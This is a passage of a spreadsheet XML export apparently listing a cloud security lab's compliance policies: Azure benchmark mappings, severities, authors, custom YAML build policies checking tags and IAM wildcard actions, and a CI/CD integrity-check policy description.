      </c>
      <c r="AG1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 t="inlineStr">
        <is>
          <t>446bf3d4-2811-447d-b553-ae07334d042f</t>
        </is>
      </c>
      <c r="AI109" t="inlineStr"/>
      <c r="AJ109" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK109" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="110">
      <c r="A110" t="inlineStr">
        <is>
          <t>Azure Security Benchmark (v2)</t>
        </is>
      </c>
      <c r="B110" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C110" s="2" t="inlineStr"/>
      <c r="D110" t="inlineStr"/>
      <c r="E110" t="inlineStr"/>
      <c r="F110" t="inlineStr"/>
      <c r="G110" t="b">
        <v>1</v>
      </c>
      <c r="H1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 t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J110" t="inlineStr"/>
      <c r="K110" t="inlineStr">
        <is>
          <t>AZURE GCP VM - 45 Days -  Owned</t>
        </is>
      </c>
      <c r="L110" t="inlineStr"/>
      <c r="M110" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N110" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O110" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P110" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q110" t="inlineStr">
        <is>
          <t>Asset Management (AM)</t>
        </is>
      </c>
      <c r="R110" t="inlineStr">
        <is>
          <t>AM-4</t>
        </is>
      </c>
      <c r="S110" t="inlineStr">
        <is>
          <t>Custom,Azure_Security_Benchmark_(v2),AW_AZURE_AM-4</t>
        </is>
      </c>
      <c r="T110" t="b">
        <v>0</v>
      </c>
      <c r="U110" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V110" t="inlineStr"/>
      <c r="W110" t="inlineStr"/>
      <c r="X110" t="inlineStr"/>
      <c r="Y110" t="inlineStr"/>
      <c r="Z110" t="inlineStr"/>
      <c r="AA110" t="inlineStr">
        <is>
          <t>Oleg Kostine</t>
        </is>
      </c>
      <c r="AB110" t="inlineStr">
        <is>
          <t>2024-11-13 18:33:21</t>
        </is>
      </c>
      <c r="AC110" t="inlineStr"/>
      <c r="AD110" t="b">
        <v>0</v>
      </c>
      <c r="AE110" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF110" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG1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 t="inlineStr">
        <is>
          <t>418a4d3b-c322-4e64-ac7b-2cc065ee9abe</t>
        </is>
      </c>
      <c r="AI110" t="inlineStr"/>
      <c r="AJ110" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK110" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="111">
      <c r="A111" t="inlineStr">
        <is>
          <t>Azure Security Benchmark (v2)</t>
        </is>
      </c>
      <c r="B111" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C111" s="2" t="inlineStr"/>
      <c r="D111" t="inlineStr"/>
      <c r="E111" t="inlineStr"/>
      <c r="F111" t="inlineStr"/>
      <c r="G111" t="b">
        <v>1</v>
      </c>
      <c r="H1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 t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J111" t="inlineStr"/>
      <c r="K111" t="inlineStr">
        <is>
          <t>AZURE Pramm -- automation account azure - New</t>
        </is>
      </c>
      <c r="L111" t="inlineStr"/>
      <c r="M111" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N111" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O111" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P111" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q111" t="inlineStr">
        <is>
          <t>Network security (NS)</t>
        </is>
      </c>
      <c r="R111" t="inlineStr">
        <is>
          <t>NS-6</t>
        </is>
      </c>
      <c r="S111" t="inlineStr">
        <is>
          <t>AW_AZURE_NS-6,Custom,Azure_Security_Benchmark_(v2)</t>
        </is>
      </c>
      <c r="T111" t="b">
        <v>0</v>
      </c>
      <c r="U111" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V111" t="inlineStr"/>
      <c r="W111" t="inlineStr"/>
      <c r="X111" t="inlineStr"/>
      <c r="Y111" t="inlineStr"/>
      <c r="Z111" t="inlineStr"/>
      <c r="AA111" t="inlineStr">
        <is>
          <t>Oleg Kostine</t>
        </is>
      </c>
      <c r="AB111" t="inlineStr">
        <is>
          <t>2024-11-13 18:32:40</t>
        </is>
      </c>
      <c r="AC111" t="inlineStr"/>
      <c r="AD111" t="b">
        <v>0</v>
      </c>
      <c r="AE111" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF111" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG1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 t="inlineStr">
        <is>
          <t>e337a74a-d777-479b-b668-c29f6cf4639c</t>
        </is>
      </c>
      <c r="AI111" t="inlineStr"/>
      <c r="AJ111" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK111" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="112">
      <c r="A112" t="inlineStr">
        <is>
          <t>Azure Security Benchmark (v2)</t>
        </is>
      </c>
      <c r="B112" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C112" s="2" t="inlineStr"/>
      <c r="D112" t="inlineStr"/>
      <c r="E112" t="inlineStr"/>
      <c r="F112" t="inlineStr"/>
      <c r="G112" t="b">
        <v>1</v>
      </c>
      <c r="H1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 t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J112" t="inlineStr"/>
      <c r="K112" t="inlineStr">
        <is>
          <t>AZURE mdavis1 test 10302024</t>
        </is>
      </c>
      <c r="L112" t="inlineStr"/>
      <c r="M112" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N112" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O112" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P112" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q112" t="inlineStr">
        <is>
          <t>Asset Management (AM)</t>
        </is>
      </c>
      <c r="R112" t="inlineStr">
        <is>
          <t>AM-4</t>
        </is>
      </c>
      <c r="S112" t="inlineStr">
        <is>
          <t>Custom,Azure_Security_Benchmark_(v2),AW_AZURE_AM-4</t>
        </is>
      </c>
      <c r="T112" t="b">
        <v>0</v>
      </c>
      <c r="U112" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V112" t="inlineStr"/>
      <c r="W112" t="inlineStr"/>
      <c r="X112" t="inlineStr"/>
      <c r="Y112" t="inlineStr"/>
      <c r="Z112" t="inlineStr"/>
      <c r="AA112" t="inlineStr">
        <is>
          <t>Oleg Kostine</t>
        </is>
      </c>
      <c r="AB112" t="inlineStr">
        <is>
          <t>2024-11-13 18:32:50</t>
        </is>
      </c>
      <c r="AC112" t="inlineStr"/>
      <c r="AD112" t="b">
        <v>0</v>
      </c>
      <c r="AE112" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF112" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG1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 t="inlineStr">
        <is>
          <t>94fa202a-a0f1-4d58-a40c-a5ffa4e5a21b</t>
        </is>
      </c>
      <c r="AI112" t="inlineStr"/>
      <c r="AJ112" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK112" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="113">
      <c r="A113" t="inlineStr">
        <is>
          <t>Azure Security Benchmark (v2)</t>
        </is>
      </c>
      <c r="B113" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C113" s="2" t="inlineStr"/>
      <c r="D113" t="inlineStr"/>
      <c r="E113" t="inlineStr"/>
      <c r="F113" t="inlineStr"/>
      <c r="G113" t="b">
        <v>1</v>
      </c>
      <c r="H1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 t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J113" t="inlineStr"/>
      <c r="K113" t="inlineStr">
        <is>
          <t>AZURE GCP VM - 7 Days -  No Owner</t>
        </is>
      </c>
      <c r="L113" t="inlineStr"/>
      <c r="M113" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N113" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O113" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P113" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q113" t="inlineStr">
        <is>
          <t>Asset Management (AM)</t>
        </is>
      </c>
      <c r="R113" t="inlineStr">
        <is>
          <t>AM-4</t>
        </is>
      </c>
      <c r="S113" t="inlineStr">
        <is>
          <t>ADAM2,NOTADAM,NEWONE,Custom,Azure_Security_Benchmark_(v2)</t>
        </is>
      </c>
      <c r="T113" t="b">
        <v>0</v>
      </c>
      <c r="U113" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V113" t="inlineStr"/>
      <c r="W113" t="inlineStr"/>
      <c r="X113" t="inlineStr"/>
      <c r="Y113" t="inlineStr"/>
      <c r="Z113" t="inlineStr"/>
      <c r="AA113" t="inlineStr">
        <is>
          <t>Oleg Kostine</t>
        </is>
      </c>
      <c r="AB113" t="inlineStr">
        <is>
          <t>2024-11-19 10:55:30</t>
        </is>
      </c>
      <c r="AC113" t="inlineStr"/>
      <c r="AD113" t="b">
        <v>0</v>
      </c>
      <c r="AE113" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF113" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG1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 t="inlineStr">
        <is>
          <t>fd6b6408-a5bb-4905-ad30-68f2c28ec750</t>
        </is>
      </c>
      <c r="AI113" t="inlineStr"/>
      <c r="AJ113" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK113" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="114">
      <c r="A114" t="inlineStr">
        <is>
          <t>Azure Security Benchmark (v2)</t>
        </is>
      </c>
      <c r="B114" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C114" s="2" t="inlineStr"/>
      <c r="D114" t="inlineStr"/>
      <c r="E114" t="inlineStr"/>
      <c r="F114" t="inlineStr"/>
      <c r="G114" t="b">
        <v>1</v>
      </c>
      <c r="H1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 t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J114" t="inlineStr"/>
      <c r="K114" t="inlineStr">
        <is>
          <t>AZURE GCP VM - 3 Days -  No Owner</t>
        </is>
      </c>
      <c r="L114" t="inlineStr"/>
      <c r="M114" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N114" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O114" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P114" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q114" t="inlineStr">
        <is>
          <t>Asset Management (AM)</t>
        </is>
      </c>
      <c r="R114" t="inlineStr">
        <is>
          <t>AM-4</t>
        </is>
      </c>
      <c r="S114" t="inlineStr">
        <is>
          <t>Custom,Azure_Security_Benchmark_(v2),AW_AZURE_AM-4</t>
        </is>
      </c>
      <c r="T114" t="b">
        <v>0</v>
      </c>
      <c r="U114" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V114" t="inlineStr"/>
      <c r="W114" t="inlineStr"/>
      <c r="X114" t="inlineStr"/>
      <c r="Y114" t="inlineStr"/>
      <c r="Z114" t="inlineStr"/>
      <c r="AA114" t="inlineStr">
        <is>
          <t>Oleg Kostine</t>
        </is>
      </c>
      <c r="AB114" t="inlineStr">
        <is>
          <t>2024-11-13 18:33:27</t>
        </is>
      </c>
      <c r="AC114" t="inlineStr"/>
      <c r="AD114" t="b">
        <v>0</v>
      </c>
      <c r="AE114" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF114" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG1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 t="inlineStr">
        <is>
          <t>a2a5f2de-b5c1-495d-b1e6-9c6737b295af</t>
        </is>
      </c>
      <c r="AI114" t="inlineStr"/>
      <c r="AJ114" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK114" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="115">
      <c r="A115" t="inlineStr">
        <is>
          <t>Azure Security Benchmark (v2)</t>
        </is>
      </c>
      <c r="B115" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C115" s="2" t="inlineStr"/>
      <c r="D115" t="inlineStr"/>
      <c r="E115" t="inlineStr"/>
      <c r="F115" t="inlineStr"/>
      <c r="G115" t="b">
        <v>1</v>
      </c>
      <c r="H1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 t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J115" t="inlineStr"/>
      <c r="K115" t="inlineStr">
        <is>
          <t>AZURE GCP GKE - 45 Days -  Owned</t>
        </is>
      </c>
      <c r="L115" t="inlineStr"/>
      <c r="M115" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N115" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O115" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P115" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q115" t="inlineStr">
        <is>
          <t>Asset Management (AM)</t>
        </is>
      </c>
      <c r="R115" t="inlineStr">
        <is>
          <t>AM-4</t>
        </is>
      </c>
      <c r="S115" t="inlineStr">
        <is>
          <t>Custom,Azure_Security_Benchmark_(v2),AW_AZURE_AM-4</t>
        </is>
      </c>
      <c r="T115" t="b">
        <v>0</v>
      </c>
      <c r="U115" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V115" t="inlineStr"/>
      <c r="W115" t="inlineStr"/>
      <c r="X115" t="inlineStr"/>
      <c r="Y115" t="inlineStr"/>
      <c r="Z115" t="inlineStr"/>
      <c r="AA115" t="inlineStr">
        <is>
          <t>Oleg Kostine</t>
        </is>
      </c>
      <c r="AB115" t="inlineStr">
        <is>
          <t>2024-11-13 18:33:29</t>
        </is>
      </c>
      <c r="AC115" t="inlineStr"/>
      <c r="AD115" t="b">
        <v>0</v>
      </c>
      <c r="AE115" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF115" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG1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 t="inlineStr">
        <is>
          <t>6a924c2c-6d3f-4222-a42d-9e315dc30559</t>
        </is>
      </c>
      <c r="AI115" t="inlineStr"/>
      <c r="AJ115" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK115" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="116">
      <c r="A116" t="inlineStr">
        <is>
          <t>Azure Security Benchmark (v2)</t>
        </is>
      </c>
      <c r="B116" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C116" s="2" t="inlineStr"/>
      <c r="D116" t="inlineStr"/>
      <c r="E116" t="inlineStr"/>
      <c r="F116" t="inlineStr"/>
      <c r="G116" t="b">
        <v>1</v>
      </c>
      <c r="H1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 t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J116" t="inlineStr"/>
      <c r="K116" t="inlineStr">
        <is>
          <t>AZURE mdavis1 tag test 4</t>
        </is>
      </c>
      <c r="L116" t="inlineStr"/>
      <c r="M116" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N116" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O116" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P116" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q116" t="inlineStr">
        <is>
          <t>Asset Management (AM)</t>
        </is>
      </c>
      <c r="R116" t="inlineStr">
        <is>
          <t>AM-4</t>
        </is>
      </c>
      <c r="S116" t="inlineStr">
        <is>
          <t>Custom,Azure_Security_Benchmark_(v2),AW_AZURE_AM-4</t>
        </is>
      </c>
      <c r="T116" t="b">
        <v>0</v>
      </c>
      <c r="U116" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V116" t="inlineStr"/>
      <c r="W116" t="inlineStr"/>
      <c r="X116" t="inlineStr"/>
      <c r="Y116" t="inlineStr"/>
      <c r="Z116" t="inlineStr"/>
      <c r="AA116" t="inlineStr">
        <is>
          <t>Oleg Kostine</t>
        </is>
      </c>
      <c r="AB116" t="inlineStr">
        <is>
          <t>2024-11-13 18:32:49</t>
        </is>
      </c>
      <c r="AC116" t="inlineStr"/>
      <c r="AD116" t="b">
        <v>0</v>
      </c>
      <c r="AE116" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF116" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG1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 t="inlineStr">
        <is>
          <t>83bc7166-40fe-49d5-932f-ecbcdc70de11</t>
        </is>
      </c>
      <c r="AI116" t="inlineStr"/>
      <c r="AJ116" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK116" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="117">
      <c r="A117" t="inlineStr"/>
      <c r="B117" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C117" s="2" t="inlineStr"/>
      <c r="D117" t="inlineStr"/>
      <c r="E117" t="inlineStr"/>
      <c r="F117" t="inlineStr"/>
      <c r="G117" t="b">
        <v>0</v>
      </c>
      <c r="H1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 t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J117" t="inlineStr"/>
      <c r="K117" t="inlineStr">
        <is>
          <t>build_policy_001: AFLAC DEMO</t>
        </is>
      </c>
      <c r="L117" t="inlineStr"/>
      <c r="M117" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N117" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O117" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P117" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q117" t="inlineStr"/>
      <c r="R117" t="inlineStr"/>
      <c r="S117" t="inlineStr">
        <is>
          <t>rannaladasu,Custom</t>
        </is>
      </c>
      <c r="T117" t="b">
        <v>0</v>
      </c>
      <c r="U117" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V117" t="inlineStr"/>
      <c r="W117" t="inlineStr">
        <is>
          <t>Ensure Owner Tag Exists in CloudFormation Templates</t>
        </is>
      </c>
      <c r="X117" t="inlineStr">
        <is>
          <t>fix it</t>
        </is>
      </c>
      <c r="Y117" t="inlineStr"/>
      <c r="Z117" t="inlineStr">
        <is>
          <t>---
metadata:
  name: "build_policy_001: AFLAC DEMO"
  severity: "high"
  guidelines: "Ensure Owner Tag Exists in CloudFormation Templates"
  # id: "AFLAC-001"
  category: general
scope:
  provider: aws
definition:
  or:
    - cond_type: attribute
      resource_types: ["AWS::RDS::DBInstance", "AWS::EC2::Instance", "AWS::S3::Bucket"]
      attribute: "Tags[?(@.Key == \"admin\")]"
      operator: "jsonpath_exists"</t>
        </is>
      </c>
      <c r="AA117" t="inlineStr">
        <is>
          <t>Oleg Kostine</t>
        </is>
      </c>
      <c r="AB117" t="inlineStr">
        <is>
          <t>2024-11-19 10:55:30</t>
        </is>
      </c>
      <c r="AC117" t="inlineStr"/>
      <c r="AD117" t="b">
        <v>0</v>
      </c>
      <c r="AE117" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF117" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG1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 t="inlineStr">
        <is>
          <t>e06a2566-003b-4726-a6ec-4ee82651ecbd</t>
        </is>
      </c>
      <c r="AI117" t="inlineStr"/>
      <c r="AJ117" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK117" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="118">
      <c r="A118" t="inlineStr"/>
      <c r="B118" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C118" s="2" t="inlineStr"/>
      <c r="D118" t="inlineStr"/>
      <c r="E118" t="inlineStr"/>
      <c r="F118" t="inlineStr"/>
      <c r="G118" t="b">
        <v>0</v>
      </c>
      <c r="H1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 t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J118" t="inlineStr"/>
      <c r="K118" t="inlineStr">
        <is>
          <t>aws build policy iam</t>
        </is>
      </c>
      <c r="L118" t="inlineStr"/>
      <c r="M118" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N118" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O118" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P118" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q118" t="inlineStr"/>
      <c r="R118" t="inlineStr"/>
      <c r="S118" t="inlineStr"/>
      <c r="T118" t="b">
        <v>0</v>
      </c>
      <c r="U118" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V118" t="inlineStr"/>
      <c r="W118" t="inlineStr"/>
      <c r="X118" t="inlineStr"/>
      <c r="Y118" t="inlineStr"/>
      <c r="Z118" t="inlineStr">
        <is>
          <t>---
metadata:
  name: "aws build policy iam "
  severity: "medium"
  guidelines: "test" #add text that explains the configuration the policy looks for, its implications, and how to fix it
  category: "general" 
scope:
  provider: "aws"
definition: 
  and:
    - cond_type: "attribute"
      resource_types: "aws_iam_role_policy"
      attribute: "policy.Statement[?(@.Effect == \"Allow\")].Action"
      operator: "jsonpath_not_contains"
      value:  "s3:*"
    - cond_type: "attribute"
      resource_types: "aws_iam_role_policy"
      attribute: "policy.Statement[?(@.Effect == \"Allow\")].Action"
      operator: "jsonpath_not_contains"
      value:  "ayz:*"   
#    - cond_type: "attribute"
#     resource_types: "aws_iam_role_policy"
#     attribute: "policy.Statement.*.Effect"
#      operator: "not_equals"
#      value: "Allow"
#    - cond_type: "attribute"
#     resource_types: "aws_iam_role_policy"
#      attribute: "policy.Statement.*.Resource"
#      operator: "not_equals"
#      value: "*"
# The example below checks EC2s with instance_type t3.micro or t3.nano. for more examples please visit our docs - https://docs.bridgecrew.io/docs/yaml-format-for-custom-policies
#  or:
#   - cond_type: "attribute"
#     resource_types:
#     - "aws_instance"
#     attribute: "instance_type"
#     operator: "equals"
#     value: "t3.micro"
#   - cond_type: "attribute"
#     resource_types:
#     - "aws_instance"
#     attribute: "instance_type"
#     operator: "equals"
#     value: "t3.nano"</t>
        </is>
      </c>
      <c r="AA118" t="inlineStr">
        <is>
          <t>Marius Banica</t>
        </is>
      </c>
      <c r="AB118" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC118" t="inlineStr"/>
      <c r="AD118" t="b">
        <v>0</v>
      </c>
      <c r="AE118" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF118" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG1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 t="inlineStr">
        <is>
          <t>bb21e93e-7c7d-4206-b0c4-aa610b85a6c2</t>
        </is>
      </c>
      <c r="AI118" t="inlineStr"/>
      <c r="AJ118" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK118" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="119">
      <c r="A119" t="inlineStr"/>
      <c r="B119" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C119" s="2" t="inlineStr"/>
      <c r="D119" t="inlineStr"/>
      <c r="E119" t="inlineStr"/>
      <c r="F119" t="inlineStr"/>
      <c r="G119" t="b">
        <v>0</v>
      </c>
      <c r="H1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19" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J119" t="inlineStr">
        <is>
          <t>AWS Guard Duty</t>
        </is>
      </c>
      <c r="K119" t="inlineStr">
        <is>
          <t>mark test 1</t>
        </is>
      </c>
      <c r="L119" t="inlineStr"/>
      <c r="M119" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N119" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O119" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P119" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q119" t="inlineStr"/>
      <c r="R119" t="inlineStr"/>
      <c r="S119" t="inlineStr"/>
      <c r="T119" t="b">
        <v>0</v>
      </c>
      <c r="U119" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V119" t="inlineStr">
        <is>
          <t>AWS Guard Duty</t>
        </is>
      </c>
      <c r="W119" t="inlineStr"/>
      <c r="X119" t="inlineStr"/>
      <c r="Y119" t="inlineStr"/>
      <c r="Z119" t="inlineStr">
        <is>
          <t>config from cloud.resource where finding.source = 'AWS Guard Duty' AND finding.type = 'AWS GuardDuty IAM' AND finding.severity = 'critical'</t>
        </is>
      </c>
      <c r="AA119" t="inlineStr">
        <is>
          <t>Marius Banica</t>
        </is>
      </c>
      <c r="AB119" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC119" t="inlineStr"/>
      <c r="AD119" t="b">
        <v>0</v>
      </c>
      <c r="AE119" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF119" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG1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 t="inlineStr">
        <is>
          <t>2264d986-6343-4cec-bb12-3ca0a3f1dc34</t>
        </is>
      </c>
      <c r="AI119" t="inlineStr">
        <is>
          <t>7354464f-e550-46e8-a203-a93e4dfad891</t>
        </is>
      </c>
      <c r="AJ119" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK119" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="120">
      <c r="A120" t="inlineStr"/>
      <c r="B120" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C120" s="2" t="inlineStr"/>
      <c r="D120" t="inlineStr"/>
      <c r="E120" t="inlineStr"/>
      <c r="F120" t="inlineStr"/>
      <c r="G120" t="b">
        <v>1</v>
      </c>
      <c r="H1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 t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J120" t="inlineStr">
        <is>
          <t>CI/CD:Artifact Integrity Validation:</t>
        </is>
      </c>
      <c r="K120" t="inlineStr">
        <is>
          <t>Missing integrity check for downloaded executable in GitLab CI pipeline</t>
        </is>
      </c>
      <c r="L120" t="inlineStr"/>
      <c r="M120" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N120" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O120" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P120" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q120" t="inlineStr"/>
      <c r="R120" t="inlineStr"/>
      <c r="S120" t="inlineStr"/>
      <c r="T120" t="b">
        <v>0</v>
      </c>
      <c r="U120" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V120" t="inlineStr">
        <is>
          <t>CI/CD:Artifact Integrity Validation:</t>
        </is>
      </c>
      <c r="W120" t="inlineStr">
        <is>
          <t>Executables are downloaded and executed during a pipeline run without being validated for integrity, a check which verifies the executable`s content. An attacker who compromises the executable can execute code in the pipeline that can exfiltrate credentials or affect the build process in order to ship malicious code or artifacts to production.</t>
        </is>
      </c>
      <c r="X120" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/gitlab-cicd-pipeline-policies/gl-ci-miss-integrity-check-download-exe</t>
